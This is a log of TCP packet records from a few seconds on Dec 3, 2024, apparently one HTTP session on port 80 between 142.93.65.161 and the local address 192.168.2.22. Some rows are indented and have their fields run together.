Dec 3, 2024 14:01:54.844456911 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.844713926 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.844758987 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.846028090 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.846267939 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.846317053 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.847671986 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.847796917 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.847840071 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.849179983 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.849380016 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.849426031 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.850883961 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.851033926 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.851083994 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.852377892 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.852488041 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.852534056 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.853970051 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.854094028 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.854137897 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.855556011 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.855633974 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.855710030 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.857120991 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.857183933 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.857232094 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.858674049 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.858968019 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.859014034 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.860352993 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.860466957 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.860511065 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.861895084 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.861967087 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.862015009 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.863531113 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.863781929 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.863826990 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.865055084 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.865216970 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.865263939 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.866641998 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.866662979 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.866707087 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.868282080 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.868361950 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.868405104 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.869792938 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.869927883 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.869971037 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.871339083 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.871455908 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.871496916 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.872977018 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.873050928 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.873114109 CET    49181  80     192.168.2.22   142.93.65.161
Dec 3, 2024 14:01:54.874577045 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.874891996 CET    80     49181  142.93.65.161  192.168.2.22
Dec 3, 2024 14:01:54.874953032 CET    49181  80     192.168.2.22   142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.876190901 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.876203060 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.876243114 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.877769947 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.877902985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.877943039 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.879317045 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.879394054 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.879437923 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.880848885 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.880959034 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.881010056 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986128092 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986145020 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986243963 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.986433983 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987196922 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987209082 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987251997 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.987874985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.988209963 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.988265991 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990263939 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990278006 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990315914 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990744114 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990799904 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.990843058 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.991945982 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.992528915 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.992572069 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.993350029 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.993362904 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.993402958 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.994651079 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.994987011 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.995038033 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.995882988 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.996051073 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.996100903 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.997267008 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.997281075 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.997322083 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.998593092 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.998605013 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.998648882 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:54.999732971 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.999746084 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:54.999779940 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.000947952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.001159906 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.001204967 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.002223015 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.002434969 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.002476931 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.003353119 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.003591061 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.003629923 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.004652023 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.004664898 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.004695892 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.006063938 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.006078005 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.006110907 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.007023096 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.007411003 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.007458925 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.008636951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.008651018 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.008682966 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.009392977 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.009639978 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.009680986 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.010632038 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.010761023 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.010799885 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.011828899 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.012088060 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.012131929 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.013098955 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.013160944 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.013200998 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.014244080 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.014334917 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.014384985 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.015450001 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.015547991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.015598059 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.016746044 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.016798973 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.016845942 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.017884016 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.018052101 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.018099070 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.019119024 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.019350052 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.019402981 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.020313978 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.020576954 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.020627975 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.021481991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.021673918 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.021724939 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.022706985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.022923946 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.022974014 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.023916006 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.024003983 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.024049997 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.025090933 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.025207043 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.025250912 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.026293993 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.221915007 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.221999884 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222013950 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222027063 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222049952 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222158909 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222172022 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.222203970 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225379944 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225403070 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225414991 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225449085 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225627899 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225640059 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225651979 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.225683928 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.226314068 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.226358891 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.226403952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.227499962 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.227560997 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.227576017 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.228559017 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.228600979 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.228938103 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.229624033 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.229664087 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.229727030 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.230715990 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.230762959 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.231054068 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.232276917 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.232325077 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.232383966 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.233320951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.233351946 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.233365059 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.234324932 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.234373093 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.234431028 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.235177040 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.235222101 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.235275984 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.236269951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.236320019 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.236321926 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.237354040 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.237397909 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.237497091 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.238461971 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.238509893 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.238559008 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.239581108 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.239629030 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.239667892 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.240660906 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.240711927 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.240732908 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.241734028 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.241782904 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.241832972 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.242836952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.242887020 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.242985964 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.243935108 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.243998051 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.244030952 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.244972944 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.245018959 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388490915 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388571978 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388628960 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388919115 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.388998985 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.389040947 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.390048027 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.390235901 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.390281916 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.391165018 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.391263008 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.391302109 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.392230034 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.392481089 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.392522097 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.393393993 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.393495083 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.393533945 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.394501925 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.394654036 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.394697905 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.395648956 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.395793915 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.395843029 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.396755934 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.396873951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.396910906 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.397717953 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.397874117 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.397913933 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.398926973 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.398947954 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.398977041 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.400033951 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.400110006 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.400161982 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.401103020 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.401243925 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.401285887 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.402168989 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.402247906 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.402287960 CET4918180192.168.2.22142.93.65.161
                                                                                                                                                                                  Dec 3, 2024 14:01:55.403254986 CET8049181142.93.65.161192.168.2.22
                                                                                                                                                                                  Dec 3, 2024 14:01:55.403392076 CET8049181142.93.65.161192.168.2.22
Dec 3, 2024 14:01:55.403433084 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.404351950 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.404479980 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.404522896 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.405430079 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.405508995 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.405544996 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.406646013 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.406805038 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.406843901 CET  49181        80         192.168.2.22     142.93.65.161
Dec 3, 2024 14:01:55.407660961 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.407771111 CET  80           49181      142.93.65.161    192.168.2.22
Dec 3, 2024 14:01:55.407813072 CET  49181        80         192.168.2.22     142.93.65.161
